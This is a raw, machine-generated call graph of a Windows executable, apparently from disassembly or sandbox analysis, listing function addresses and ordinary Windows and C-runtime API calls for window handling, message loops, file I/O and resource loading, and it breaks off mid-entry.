API calls 104851->104852 104853 b537bb 104852->104853 105107 b54ddd 104853->105107 104856 b537dc Mailbox 105131 b58047 104856->105131 104857 b8d173 105178 bb955b 104857->105178 104860 b8d192 104863 b72d55 _free 58 API calls 104860->104863 104865 b8d19f 104863->104865 104867 b54e4a 84 API calls 104865->104867 104869 b8d1a8 104867->104869 104873 b53ed0 59 API calls 104869->104873 104870 b57de1 59 API calls 104871 b53808 104870->104871 105138 b584c0 104871->105138 104875 b8d1c3 104873->104875 104874 b5381a Mailbox 104876 b57de1 59 API calls 104874->104876 104877 b53ed0 59 API calls 104875->104877 104878 b53840 104876->104878 104879 b8d1df 104877->104879 104880 b584c0 69 API calls 104878->104880 104881 b54706 61 API calls 104879->104881 104883 b5384f Mailbox 104880->104883 104882 b8d204 104881->104882 104884 b53ed0 59 API calls 104882->104884 104886 b57667 59 API calls 104883->104886 104885 b8d210 104884->104885 104887 b58047 59 API calls 104885->104887 104888 b5386d 104886->104888 104889 b8d21e 104887->104889 105142 b53ed0 104888->105142 104891 b53ed0 59 API calls 104889->104891 104894 b8d22d 104891->104894 104899 b58047 59 API calls 104894->104899 104895 b53887 104895->104869 104896 b53891 104895->104896 104897 b72efd _W_store_winword 60 API calls 104896->104897 104898 b5389c 104897->104898 104898->104875 104900 b538a6 104898->104900 104901 b8d24f 104899->104901 104902 b72efd _W_store_winword 60 API calls 104900->104902 104903 b53ed0 59 API calls 104901->104903 104904 b538b1 104902->104904 104905 b8d25c 104903->104905 104904->104879 104906 b538bb 104904->104906 104905->104905 104907 b72efd _W_store_winword 60 API calls 104906->104907 104908 b538c6 104907->104908 104908->104894 104909 b53907 104908->104909 104911 b53ed0 59 API calls 104908->104911 104909->104894 104910 b53914 104909->104910 105158 b592ce 104910->105158 104913 b538ea 104911->104913 104915 b58047 59 API calls 104913->104915 104916 b538f8 104915->104916 104918 b53ed0 59 API calls 104916->104918 104918->104909 104921 b5928a 59 API calls 104923 b5394f 104921->104923 104922 b58ee0 60 API calls 104922->104923 104923->104921 104923->104922 104924 b53ed0 59 API calls 104923->104924 104925 b53995 Mailbox 104923->104925 104924->104923 104925->104795 104927 b57292 __ftell_nolock 104926->104927 104928 b8ea22 _memset 104927->104928 104929 b572ab 104927->104929 104932 b8ea3e GetOpenFileNameW 104928->104932 105811 b54750 104929->105811 104934 b8ea8d 104932->104934 104935 b57bcc 59 API calls 104934->104935 104937 b8eaa2 104935->104937 104937->104937 104939 b572c9 105839 b5686a 104939->105839 104943 b57c45 104942->104943 104944 b57bd8 __wsetenvp 104942->104944 104945 b57d2c 59 API calls 104943->104945 104946 b57c13 104944->104946 104947 b57bee 104944->104947 104950 b57bf6 _memmove 104945->104950 104948 b58029 59 API calls 104946->104948 106107 b57f27 59 API calls Mailbox 104947->106107 104948->104950 104950->104808 104952 b6093a __ftell_nolock 104951->104952 106108 b56d80 104952->106108 104954 b6093f 104966 b53c14 104954->104966 106119 b6119e 89 API calls 104954->106119 104956 b6094c 104956->104966 106120 b63ee7 91 API calls Mailbox 104956->106120 104958 b60955 104959 b60959 GetFullPathNameW 104958->104959 104958->104966 104960 b57bcc 59 API calls 104959->104960 104961 b60985 104960->104961 104962 b57bcc 59 API calls 104961->104962 104963 b60992 104962->104963 104964 b57bcc 59 API calls 104963->104964 104965 b94cab _wcscat 104963->104965 104964->104966 104966->104804 104966->104812 104968 b53ab0 LoadImageW RegisterClassExW 104967->104968 104969 b8d261 104967->104969 106158 b53041 7 API calls 104968->106158 106159 b547a0 LoadImageW EnumResourceNamesW 104969->106159 104972 b53b34 104974 b539d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104972->104974 104973 b8d26a 104974->104820 104976 b54375 _memset 104975->104976 106160 b54182 104976->106160 104979 b543fa 104981 b54414 Shell_NotifyIconW 104979->104981 104982 b54430 Shell_NotifyIconW 104979->104982 104983 b54422 104981->104983 104982->104983 106164 b5407c 104983->106164 104985 b54429 104985->104822 104987 b94cc3 104986->104987 104999 b609f5 104986->104999 106242 bb9e4a 89 API calls 4 library calls 104987->106242 104989 b60cfa 104989->104826 104992 b60ee4 104992->104989 104993 b60ef1 104992->104993 106240 b61093 331 API calls Mailbox 104993->106240 104994 b60a4b PeekMessageW 105062 b60a05 Mailbox 104994->105062 104997 b60ef8 LockWindowUpdate DestroyWindow GetMessageW 104997->104989 105001 b60f2a 104997->105001 104998 b60ce4 104998->104989 106239 b61070 10 API calls Mailbox 104998->106239 104999->105062 106243 b59e5d 60 API calls 104999->106243 106244 ba6349 331 API calls 104999->106244 105000 b94e81 Sleep 105000->105062 105003 b95c58 TranslateMessage DispatchMessageW GetMessageW 105001->105003 105003->105003 105004 b95c88 105003->105004 105004->104989 105005 b94d50 TranslateAcceleratorW 105007 b60e43 PeekMessageW 105005->105007 105005->105062 105006 b60ea5 TranslateMessage DispatchMessageW 105006->105007 105007->105062 105008 b70db6 59 API calls Mailbox 105008->105062 105009 b60d13 timeGetTime 105009->105062 105010 b9581f WaitForSingleObject 105012 b9583c GetExitCodeProcess CloseHandle 105010->105012 105010->105062 105046 b60f95 105012->105046 105013 b60e5f Sleep 105045 b60e70 Mailbox 105013->105045 105014 b58047 59 API calls 105014->105062 105015 b57667 59 API calls 105015->105045 105016 b95af8 Sleep 105016->105045 105019 b7049f timeGetTime 105019->105045 105020 b60f4e timeGetTime 106241 b59e5d 60 API calls 105020->106241 105023 b95b8f GetExitCodeProcess 105028 b95bbb CloseHandle 105023->105028 105029 b95ba5 WaitForSingleObject 105023->105029 105026 bd5f25 110 API calls 105026->105045 105027 b5b7dd 109 API calls 105027->105045 105028->105045 105029->105028 105029->105062 105031 b95874 105031->105046 105032 b59e5d 60 API calls 105032->105062 105033 b95c17 Sleep 105033->105062 105034 b95078 Sleep 105034->105062 105035 b57de1 59 API calls 105035->105045 105041 b59ea0 304 API calls 105041->105062 105045->105015 105045->105019 105045->105023 105045->105026 105045->105027 105045->105031 105045->105033 105045->105034 105045->105035 105045->105046 105045->105062 106269 bb2408 60 API calls 105045->106269 106270 b59e5d 60 API calls 105045->106270 106271 b589b3 69 API calls Mailbox 105045->106271 106272 b5b73c 331 API calls 105045->106272 106273 ba64da 60 API calls 105045->106273 106274 bb5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105045->106274 106275 bb3c55 66 API calls Mailbox 105045->106275 105046->104826 105049 bb9e4a 89 API calls 105049->105062 105050 b59c90 59 API calls Mailbox 105050->105062 105051 b584c0 69 API calls 105051->105062 105052 b5b73c 304 API calls 105052->105062 105054 ba617e 59 API calls Mailbox 105054->105062 105055 b57de1 59 API calls 105055->105062 105056 b589b3 69 API calls 105056->105062 105057 b955d5 VariantClear 105057->105062 105058 b58cd4 59 API calls Mailbox 105058->105062 105059 b9566b VariantClear 105059->105062 105060 b95419 VariantClear 105060->105062 105061 ba6e8f 59 API calls 105061->105062 105062->104994 105062->104998 105062->105000 105062->105005 105062->105006 105062->105007 105062->105008 105062->105009 105062->105010 105062->105013 105062->105014 105062->105016 105062->105020 105062->105032 105062->105041 105062->105045 105062->105046 105062->105049 105062->105050 105062->105051 105062->105052 105062->105054 105062->105055 105062->105056 105062->105057 105062->105058 105062->105059 105062->105060 105062->105061 106187 b5e6a0 105062->106187 106218 b5f460 105062->106218 106236 b5e420 331 API calls 105062->106236 106237 b5fce0 331 API calls 2 library calls 105062->106237 106238 b531ce IsDialogMessageW GetClassLongW 105062->106238 106245 bd6018 59 API calls 105062->106245 106246 bb9a15 59 API calls Mailbox 105062->106246 106247 bad4f2 59 API calls 105062->106247 106248 b59837 105062->106248 106266 ba60ef 59 API calls 2 library calls 105062->106266 106267 b58401 59 API calls 105062->106267 106268 b582df 59 API calls Mailbox 105062->106268 105063->104828 105064->104804 105065->104816 105067 b81940 __ftell_nolock 105066->105067 105068 b54713 GetModuleFileNameW 105067->105068 105069 b57de1 59 API calls 105068->105069 105070 b54739 105069->105070 105071 b54750 60 API calls 105070->105071 105072 b54743 Mailbox 105071->105072 105072->104824 105074 b57df0 __wsetenvp _memmove 105073->105074 105075 b70db6 Mailbox 59 API calls 105074->105075 105076 b57e2e 105075->105076 105076->104829 105078 b8ed4a 105077->105078 105079 b57cbf 105077->105079 105081 b58029 59 API calls 105078->105081 106588 b57c50 105079->106588 105083 b8ed55 __wsetenvp _memmove 105081->105083 105082 b57cca 105084 b57b2e 105082->105084 105085 b8ec6b 105084->105085 105086 b57b40 105084->105086 106599 ba7bdb 59 API calls _memmove 105085->106599 106593 b57a51 105086->106593 105089 b57b4c 105089->104841 105090 b8ec75 105091 b58047 59 API calls 105090->105091 105092 b8ec7d Mailbox 105091->105092 105095 b53d3e __ftell_nolock 105093->105095 105094 b53ea4 Mailbox 105094->104849 105095->105094 105096 b57bcc 59 API calls 105095->105096 105097 b53d70 105096->105097 105105 b53da6 Mailbox 105097->105105 105219 b579f2 105097->105219 105099 b579f2 59 API calls 105099->105105 105100 b53e77 105100->105094 105101 b57de1 59 API calls 105100->105101 105103 b53e98 105101->105103 105102 b57de1 59 API calls 105102->105105 105104 b53f74 59 API calls 105103->105104 105104->105094 105105->105094 105105->105099 105105->105100 105105->105102 105222 b53f74 105105->105222 105232 b54bb5 105107->105232 105112 b54e08 LoadLibraryExW 105242 b54b6a 105112->105242 105113 b8d8e6 105115 b54e4a 84 API calls 105113->105115 105117 b8d8ed 105115->105117 105118 b54b6a 3 API calls 105117->105118 105120 b8d8f5 105118->105120 105268 b54f0b 105120->105268 105121 b54e2f 105121->105120 105122 b54e3b 105121->105122 105124 b54e4a 84 API calls 105122->105124 105126 b537d4 105124->105126 105126->104856 105126->104857 105128 b8d91c 105276 b54ec7 105128->105276 105130 b8d929 105132 b58052 105131->105132 105133 b537ef 105131->105133 105530 b57f77 59 API calls 2 library calls 105132->105530 105135 b5928a 105133->105135 105136 b70db6 Mailbox 59 API calls 105135->105136 105137 b537fb 105136->105137 105137->104870 105139 b584cb 105138->105139 105140 b584f2 105139->105140 105531 b589b3 69 API calls Mailbox 105139->105531 105140->104874 105143 b53ef3 105142->105143 105144 b53eda 105142->105144 105146 b57bcc 59 API calls 105143->105146 105145 b58047 59 API calls 105144->105145 105147 b53879 105145->105147 105146->105147 105148 b72efd 105147->105148 105149 b72f7e 105148->105149 105150 b72f09 105148->105150 105534 b72f90 60 API calls 3 library calls 105149->105534 105156 b72f2e 105150->105156 105532 b78b28 58 API calls __getptd_noexit 105150->105532 105153 b72f8b 105153->104895 105154 b72f15 105533 b78db6 9 API calls __wsplitpath_helper 105154->105533 105156->104895 105157 b72f20 105157->104895 105159 b592d6 105158->105159 105160 b70db6 Mailbox 59 API calls 105159->105160 105161 b592e4 105160->105161 105162 b53924 105161->105162 105535 b591fc 59 API calls Mailbox 105161->105535 105164 b59050 105162->105164 105536 b59160 105164->105536 105166 b70db6 Mailbox 59 API calls 105168 b53932 105166->105168 105167 b5905f 105167->105166 105167->105168 105169 b58ee0 105168->105169 105170 b8f17c 105169->105170 105172 b58ef7 105169->105172 105170->105172 105546 b58bdb 59 API calls Mailbox 105170->105546 105173 b58fff 105172->105173 105174 b59040 105172->105174 105175 b58ff8 105172->105175 105173->104923 105545 b59d3c 60 API calls Mailbox 105174->105545 105177 b70db6 Mailbox 59 API calls 105175->105177 105177->105173 105179 b54ee5 85 API calls 105178->105179 105180 bb95ca 105179->105180 105547 bb9734 105180->105547 105183 b54f0b 74 API calls 105184 bb95f7 105183->105184 105185 b54f0b 74 API calls 105184->105185 105186 bb9607 105185->105186 105187 b54f0b 74 API calls 105186->105187 105188 bb9622 105187->105188 105189 b54f0b 74 API calls 105188->105189 105190 bb963d 105189->105190 105191 b54ee5 85 API calls 105190->105191 105192 bb9654 105191->105192 105193 b7571c __malloc_crt 58 API calls 105192->105193 105194 bb965b 105193->105194 105195 b7571c __malloc_crt 58 API calls 105194->105195 105196 bb9665 105195->105196 105197 b54f0b 74 API calls 105196->105197 105198 bb9679 105197->105198 105199 bb9109 GetSystemTimeAsFileTime 105198->105199 105200 bb968c 105199->105200 105201 bb96a1 105200->105201 105202 bb96b6 105200->105202 105203 b72d55 _free 58 API calls 105201->105203 105204 bb971b 105202->105204 105205 bb96bc 105202->105205 105206 bb96a7 105203->105206 105208 b72d55 _free 58 API calls 105204->105208 105553 bb8b06 116 API calls __fcloseall 105205->105553 105209 b72d55 _free 58 API calls 105206->105209 105211 b8d186 105208->105211 105209->105211 105210 bb9713 105212 b72d55 _free 58 API calls 105210->105212 105211->104860 105213 b54e4a 105211->105213 105212->105211 105214 b54e54 105213->105214 105216 b54e5b 105213->105216 105554 b753a6 105214->105554 105217 b54e7b FreeLibrary 105216->105217 105218 b54e6a 105216->105218 105217->105218 105218->104860 105228 b57e4f 105219->105228 105221 b579fd 105221->105097 105223 b53f82 105222->105223 105227 b53fa4 _memmove 105222->105227 105225 b70db6 Mailbox 59 API calls 105223->105225 105224 b70db6 Mailbox 59 API calls 105226 b53fb8 105224->105226 105225->105227 105226->105105 105227->105224 105229 b57e62 105228->105229 105231 b57e5f _memmove 105228->105231 105230 b70db6 Mailbox 59 API calls 105229->105230 105230->105231 105231->105221 105281 b54c03 105232->105281 105235 b54c03 2 API calls 105238 b54bdc 105235->105238 105236 b54bf5 105239 b7525b 105236->105239 105237 b54bec FreeLibrary 105237->105236 105238->105236 105238->105237 105285 b75270 105239->105285 105241 b54dfc 105241->105112 105241->105113 105445 b54c36 105242->105445 105245 b54c36 2 API calls 105248 b54b8f 105245->105248 105246 b54ba1 FreeLibrary 105247 b54baa 105246->105247 105249 b54c70 105247->105249 105248->105246 105248->105247 105250 b70db6 Mailbox 59 API calls 105249->105250 105251 b54c85 105250->105251 105449 b5522e 105251->105449 105253 b54c91 _memmove 105254 b54ccc 105253->105254 105256 b54dc1 105253->105256 105257 b54d89 105253->105257 105255 b54ec7 69 API calls 105254->105255 105260 b54cd5 105255->105260 105463 bb991b 95 API calls 105256->105463 105452 b54e89 CreateStreamOnHGlobal 105257->105452 105261 b54f0b 74 API calls 105260->105261 105262 b54d69 105260->105262 105264 b8d8a7 105260->105264 105458 b54ee5 105260->105458 105261->105260 105262->105121 105265 b54ee5 85 API calls 105264->105265 105266 b8d8bb 105265->105266 105267 b54f0b 74 API calls 105266->105267 105267->105262 105269 b8d9cd 105268->105269 105270 b54f1d 105268->105270 105487 b755e2 105270->105487 105273 bb9109 105507 bb8f5f 105273->105507 105275 bb911f 105275->105128 105277 b54ed6 105276->105277 105278 b8d990 105276->105278 105512 b75c60 105277->105512 105280 b54ede 105280->105130 105282 b54bd0 105281->105282 105283 b54c0c LoadLibraryA 105281->105283 105282->105235 105282->105238 105283->105282 105284 b54c1d GetProcAddress 105283->105284 105284->105282 105286 b7527c type_info::_Type_info_dtor 105285->105286 105287 b7528f 105286->105287 105290 b752c0 105286->105290 105334 b78b28 58 API calls __getptd_noexit 105287->105334 105289 b75294 105335 b78db6 9 API calls __wsplitpath_helper 105289->105335 105304 b804e8 105290->105304 105293 b752c5 105294 b752ce 105293->105294 105295 b752db 105293->105295 105336 b78b28 58 API calls __getptd_noexit 105294->105336 105296 b75305 105295->105296 105297 b752e5 105295->105297 105319 b80607 105296->105319 105337 b78b28 58 API calls __getptd_noexit 105297->105337 105301 b7529f type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 105301->105241 105305 b804f4 type_info::_Type_info_dtor 105304->105305 105306 b79c0b __lock 58 API calls 105305->105306 105317 b80502 105306->105317 105307 b80576 105339 b805fe 105307->105339 105308 b8057d 105344 b7881d 58 API calls 2 library calls 105308->105344 105311 b805f3 type_info::_Type_info_dtor 105311->105293 105312 b80584 105312->105307 105345 b79e2b InitializeCriticalSectionAndSpinCount 105312->105345 105313 b79c93 __mtinitlocknum 58 API calls 105313->105317 105316 b805aa EnterCriticalSection 105316->105307 105317->105307 105317->105308 105317->105313 105342 b76c50 59 API calls __lock 105317->105342 105343 b76cba LeaveCriticalSection LeaveCriticalSection _doexit 105317->105343 105320 b80627 __wopenfile 105319->105320 105321 b80641 105320->105321 105333 b807fc 105320->105333 105352 b737cb 60 API calls 2 library calls 105320->105352 105350 b78b28 58 API calls __getptd_noexit 105321->105350 105323 b80646 105351 b78db6 9 API calls __wsplitpath_helper 105323->105351 105325 b8085f 105347 b885a1 105325->105347 105327 b75310 105338 b75332 LeaveCriticalSection LeaveCriticalSection _fseek 105327->105338 105329 b807f5 105329->105333 105353 b737cb 60 API calls 2 library calls 105329->105353 105331 b80814 105331->105333 105354 b737cb 60 API calls 2 library calls 105331->105354 105333->105321 105333->105325 105334->105289 105335->105301 105336->105301 105337->105301 105338->105301 105346 b79d75 LeaveCriticalSection 105339->105346 105341 b80605 105341->105311 105342->105317 105343->105317 105344->105312 105345->105316 105346->105341 105355 b87d85 105347->105355 105349 b885ba 105349->105327 105350->105323 105351->105327 105352->105329 105353->105331 105354->105333 105356 b87d91 type_info::_Type_info_dtor 105355->105356 105357 b87da7 105356->105357 105360 b87ddd 105356->105360 105442 b78b28 58 API calls __getptd_noexit 105357->105442 105359 b87dac 105443 b78db6 9 API calls __wsplitpath_helper 105359->105443 105366 b87e4e 105360->105366 105363 b87df9 105444 b87e22 LeaveCriticalSection __unlock_fhandle 105363->105444 105365 b87db6 type_info::_Type_info_dtor 105365->105349 105367 b87e6e 105366->105367 105368 b744ea __wsopen_nolock 58 API calls 105367->105368 105372 b87e8a 105368->105372 105369 b87fc1 105370 b78dc6 __invoke_watson 8 API calls 105369->105370 105371 b885a0 105370->105371 105374 b87d85 __wsopen_helper 103 API calls 105371->105374 105372->105369 105373 b87ec4 105372->105373 105381 b87ee7 105372->105381 105375 b78af4 __lseeki64 58 API calls 105373->105375 105376 b885ba 105374->105376 105377 b87ec9 105375->105377 105376->105363 105378 b78b28 __wsplitpath_helper 58 API calls 105377->105378 105379 b87ed6 105378->105379 105382 b78db6 __wsplitpath_helper 9 API calls 105379->105382 105380 b87fa5 105383 b78af4 __lseeki64 58 API calls 105380->105383 105381->105380 105388 b87f83 105381->105388 105384 b87ee0 105382->105384 105385 b87faa 105383->105385 105384->105363 105386 b78b28 __wsplitpath_helper 58 API calls 105385->105386 105387 b87fb7 105386->105387 105389 b78db6 __wsplitpath_helper 9 API calls 105387->105389 105390 b7d294 __alloc_osfhnd 61 API calls 105388->105390 105389->105369 105391 b88051 105390->105391 105392 b8805b 105391->105392 105393 b8807e 105391->105393 105394 b78af4 __lseeki64 58 API calls 105392->105394 105395 b87cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105393->105395 105396 b88060 105394->105396 105406 b880a0 105395->105406 105397 b78b28 __wsplitpath_helper 58 API calls 105396->105397 105399 b8806a 105397->105399 105398 b8811e GetFileType 105400 b88129 GetLastError 105398->105400 105401 b8816b 105398->105401 105404 b78b28 __wsplitpath_helper 58 API calls 105399->105404 105405 b78b07 __dosmaperr 58 API calls 105400->105405 105410 b7d52a __set_osfhnd 59 API calls 105401->105410 105402 b880ec GetLastError 105403 b78b07 __dosmaperr 58 API calls 105402->105403 105407 b88111 105403->105407 105404->105384 105408 b88150 CloseHandle 105405->105408 105406->105398 105406->105402 105409 b87cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105406->105409 105413 b78b28 __wsplitpath_helper 58 API calls 105407->105413 105408->105407 105411 b8815e 105408->105411 105412 b880e1 105409->105412 105417 b88189 105410->105417 105414 b78b28 __wsplitpath_helper 58 API calls 105411->105414 105412->105398 105412->105402 105413->105369 105415 b88163 105414->105415 105415->105407 105416 b88344 105416->105369 105419 b88517 CloseHandle 105416->105419 105417->105416 105418 b818c1 __lseeki64_nolock 60 API calls 105417->105418 105430 b8820a 105417->105430 105420 b881f3 105418->105420 105421 b87cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105419->105421 105424 b78af4 __lseeki64 58 API calls 105420->105424 105426 b88212 105420->105426 105423 b8853e 105421->105423 105422 b80e5b 70 API calls __read_nolock 105422->105426 105425 b88546 GetLastError 105423->105425 105433 b883ce 105423->105433 105424->105430 105427 b78b07 __dosmaperr 58 API calls 105425->105427 105426->105422 105429 b80add __close_nolock 61 API calls 105426->105429 105426->105430 105431 b897a2 __chsize_nolock 82 API calls 105426->105431 105435 b883c1 105426->105435 105439 b818c1 60 API calls __lseeki64_nolock 105426->105439 105441 b883aa 105426->105441 105428 b88552 105427->105428 105432 b7d43d __free_osfhnd 59 API calls 105428->105432 105429->105426 105430->105416 105430->105426 105434 b7d886 __write 78 API calls 105430->105434 105436 b818c1 60 API calls __lseeki64_nolock 105430->105436 105431->105426 105432->105433 105433->105369 105434->105430 105437 b80add __close_nolock 61 API calls 105435->105437 105436->105430 105438 b883c8 105437->105438 105440 b78b28 __wsplitpath_helper 58 API calls 105438->105440 105439->105426 105440->105433 105441->105416 105442->105359 105443->105365 105444->105365 105446 b54b83 105445->105446 105447 b54c3f LoadLibraryA 105445->105447 105446->105245 105446->105248 105447->105446 105448 b54c50 GetProcAddress 105447->105448 105448->105446 105450 b70db6 Mailbox 59 API calls 105449->105450 105451 b55240 105450->105451 105451->105253 105453 b54ec0 105452->105453 105454 b54ea3 FindResourceExW 105452->105454 105453->105254 105454->105453 105455 b8d933 LoadResource 105454->105455 105455->105453 105456 b8d948 SizeofResource 105455->105456 105456->105453 105457 b8d95c LockResource 105456->105457 105457->105453 105459 b54ef4 105458->105459 105460 b8d9ab 105458->105460 105464 b7584d 105459->105464 105462 b54f02 105462->105260 105463->105254 105465 b75859 type_info::_Type_info_dtor 105464->105465 105466 b7586b 105465->105466 105468 b75891 105465->105468 105477 b78b28 58 API calls __getptd_noexit 105466->105477 105479 b76c11 105468->105479 105469 b75870 105478 b78db6 9 API calls __wsplitpath_helper 105469->105478 105472 b75897 105485 b757be 83 API calls 5 library calls 105472->105485 105474 b758a6 105486 b758c8 LeaveCriticalSection LeaveCriticalSection _fseek 105474->105486 105476 b7587b type_info::_Type_info_dtor 105476->105462 105477->105469 105478->105476 105480 b76c43 EnterCriticalSection 105479->105480 105481 b76c21 105479->105481 105483 b76c39 105480->105483 105481->105480 105482 b76c29 105481->105482 105484 b79c0b __lock 58 API calls 105482->105484 105483->105472 105484->105483 105485->105474 105486->105476 105490 b755fd 105487->105490 105489 b54f2e 105489->105273 105491 b75609 type_info::_Type_info_dtor 105490->105491 105492 b7561f _memset 105491->105492 105493 b7564c 105491->105493 105494 b75644 type_info::_Type_info_dtor 105491->105494 105503 b78b28 58 API calls __getptd_noexit 105492->105503 105495 b76c11 __lock_file 59 API calls 105493->105495 105494->105489 105497 b75652 105495->105497 105505 b7541d 72 API calls 6 library calls 105497->105505 105498 b75639 105504 b78db6 9 API calls __wsplitpath_helper 105498->105504 105500 b75668 105506 b75686 LeaveCriticalSection LeaveCriticalSection _fseek 105500->105506 105503->105498 105504->105494 105505->105500 105506->105494 105510 b7520a GetSystemTimeAsFileTime 105507->105510 105509 bb8f6e 105509->105275 105511 b75238 __aulldiv 105510->105511 105511->105509 105513 b75c6c type_info::_Type_info_dtor 105512->105513 105514 b75c93 105513->105514 105515 b75c7e 105513->105515 105516 b76c11 __lock_file 59 API calls 105514->105516 105526 b78b28 58 API calls __getptd_noexit 105515->105526 105518 b75c99 105516->105518 105528 b758d0 67 API calls 6 library calls 105518->105528 105519 b75c83 105527 b78db6 9 API calls __wsplitpath_helper 105519->105527 105522 b75ca4 105529 b75cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105522->105529 105524 b75cb6 105525 b75c8e type_info::_Type_info_dtor 105524->105525 105525->105280 105526->105519 105527->105525 105528->105522 105529->105524 105530->105133 105531->105140 105532->105154 105533->105157 105534->105153 105535->105162 105537 b59169 Mailbox 105536->105537 105538 b8f19f 105537->105538 105543 b59173 105537->105543 105539 b70db6 Mailbox 59 API calls 105538->105539 105541 b8f1ab 105539->105541 105540 b5917a 105540->105167 105543->105540 105544 b59c90 59 API calls Mailbox 105543->105544 105544->105543 105545->105173 105546->105172 105552 bb9748 __tzset_nolock _wcscmp 105547->105552 105548 bb95dc 105548->105183 105548->105211 105549 b54f0b 74 API calls 105549->105552 105550 bb9109 GetSystemTimeAsFileTime 105550->105552 105551 b54ee5 85 API calls 105551->105552 105552->105548 105552->105549 105552->105550 105552->105551 105553->105210 105555 b753b2 type_info::_Type_info_dtor 105554->105555 105556 b753c6 105555->105556 105558 b753de 105555->105558 105583 b78b28 58 API calls __getptd_noexit 105556->105583 105560 b76c11 __lock_file 59 API calls 105558->105560 105563 b753d6 type_info::_Type_info_dtor 105558->105563 105559 b753cb 105584 b78db6 9 API calls __wsplitpath_helper 105559->105584 105562 b753f0 105560->105562 105567 b7533a 105562->105567 105563->105216 105568 b7535d 105567->105568 105569 b75349 105567->105569 105581 b75359 105568->105581 105586 b74a3d 105568->105586 105629 b78b28 58 API calls __getptd_noexit 105569->105629 105572 b7534e 105630 b78db6 9 API calls __wsplitpath_helper 105572->105630 105578 b75377 105603 b80a02 105578->105603 105580 b7537d 105580->105581 105582 b72d55 _free 58 API calls 105580->105582 105585 b75415 LeaveCriticalSection LeaveCriticalSection _fseek 105581->105585 105582->105581 105583->105559 105584->105563 105585->105563 105587 b74a50 105586->105587 105591 b74a74 105586->105591 105588 b746e6 __flsbuf 58 API calls 105587->105588 105587->105591 105589 b74a6d 105588->105589 105631 b7d886 105589->105631 105592 b80b77 105591->105592 105593 b75371 105592->105593 105594 b80b84 105592->105594 105596 b746e6 105593->105596 105594->105593 105595 b72d55 _free 58 API calls 105594->105595 105595->105593 105597 b74705 105596->105597 105598 b746f0 105596->105598 105597->105578 105766 b78b28 58 API calls __getptd_noexit 105598->105766 105600 b746f5 105767 b78db6 9 API calls __wsplitpath_helper 105600->105767 105602 b74700 105602->105578 105604 b80a0e type_info::_Type_info_dtor 105603->105604 105605 b80a1b 105604->105605 105606 b80a32 105604->105606 105783 b78af4 58 API calls __getptd_noexit 105605->105783 105607 b80abd 105606->105607 105609 b80a42 105606->105609 105788 b78af4 58 API calls __getptd_noexit 105607->105788 105612 b80a6a 105609->105612 105613 b80a60 105609->105613 105611 b80a20 105784 b78b28 58 API calls __getptd_noexit 105611->105784 105617 b7d206 ___lock_fhandle 59 API calls 105612->105617 105785 b78af4 58 API calls __getptd_noexit 105613->105785 105614 b80a65 105789 b78b28 58 API calls __getptd_noexit 105614->105789 105619 b80a70 105617->105619 105621 b80a8e 105619->105621 105622 b80a83 105619->105622 105620 b80ac9 105790 b78db6 9 API calls __wsplitpath_helper 105620->105790 105786 b78b28 58 API calls __getptd_noexit 105621->105786 105768 b80add 105622->105768 105625 b80a27 type_info::_Type_info_dtor 105625->105580 105627 b80a89 105787 b80ab5 LeaveCriticalSection __unlock_fhandle 105627->105787 105629->105572 105630->105581 105632 b7d892 type_info::_Type_info_dtor 105631->105632 105633 b7d8b6 105632->105633 105634 b7d89f 105632->105634 105635 b7d955 105633->105635 105637 b7d8ca 105633->105637 105732 b78af4 58 API calls __getptd_noexit 105634->105732 105738 b78af4 58 API calls __getptd_noexit 105635->105738 105640 b7d8f2 105637->105640 105641 b7d8e8 105637->105641 105639 b7d8a4 105733 b78b28 58 API calls __getptd_noexit 105639->105733 105659 b7d206 105640->105659 105734 b78af4 58 API calls __getptd_noexit 105641->105734 105642 b7d8ed 105739 b78b28 58 API calls __getptd_noexit 105642->105739 105646 b7d8f8 105648 b7d91e 105646->105648 105649 b7d90b 105646->105649 105735 b78b28 58 API calls __getptd_noexit 105648->105735 105668 b7d975 105649->105668 105650 b7d961 105740 b78db6 9 API calls __wsplitpath_helper 105650->105740 105654 b7d8ab type_info::_Type_info_dtor 105654->105591 105655 b7d917 105737 b7d94d LeaveCriticalSection __unlock_fhandle 105655->105737 105656 b7d923 105736 b78af4 58 API calls __getptd_noexit 105656->105736 105660 b7d212 type_info::_Type_info_dtor 105659->105660 105661 b7d261 EnterCriticalSection 105660->105661 105663 b79c0b __lock 58 API calls 105660->105663 105662 b7d287 type_info::_Type_info_dtor 105661->105662 105662->105646 105664 b7d237 105663->105664 105665 b7d24f 105664->105665 105741 b79e2b InitializeCriticalSectionAndSpinCount 105664->105741 105742 b7d28b LeaveCriticalSection _doexit 105665->105742 105669 b7d982 __ftell_nolock 105668->105669 105670 b7d9b6 105669->105670 105671 b7d9c1 105669->105671 105672 b7d9e0 105669->105672 105674 b7c5f6 __ld12tod 6 API calls 105670->105674 105752 b78af4 58 API calls __getptd_noexit 105671->105752 105676 b7da38 105672->105676 105677 b7da1c 105672->105677 105678 b7e1d6 105674->105678 105675 b7d9c6 105753 b78b28 58 API calls __getptd_noexit 105675->105753 105680 b7da51 105676->105680 105758 b818c1 60 API calls 3 library calls 105676->105758 105755 b78af4 58 API calls __getptd_noexit 105677->105755 105678->105655 105743 b85c6b 105680->105743 105682 b7d9cd 105754 b78db6 9 API calls __wsplitpath_helper 105682->105754 105685 b7da21 105756 b78b28 58 API calls __getptd_noexit 105685->105756 105687 b7da5f 105689 b7ddb8 105687->105689 105759 b799ac 58 API calls 2 library calls 105687->105759 105691 b7ddd6 105689->105691 105692 b7e14b WriteFile 105689->105692 105690 b7da28 105757 b78db6 9 API calls __wsplitpath_helper 105690->105757 105695 b7defa 105691->105695 105700 b7ddec 105691->105700 105696 b7ddab GetLastError 105692->105696 105703 b7dd78 105692->105703 105706 b7df05 105695->105706 105709 b7dfef 105695->105709 105696->105703 105697 b7da8b GetConsoleMode 105697->105689 105699 b7daca 105697->105699 105698 b7e184 105698->105670 105764 b78b28 58 API calls __getptd_noexit 105698->105764 105699->105689 105704 b7dada GetConsoleCP 105699->105704 105700->105698 105701 b7de5b WriteFile 105700->105701 105701->105696 105705 b7de98 105701->105705 105703->105670 105703->105698 105708 b7ded8 105703->105708 105704->105698 105730 b7db09 105704->105730 105705->105700 105711 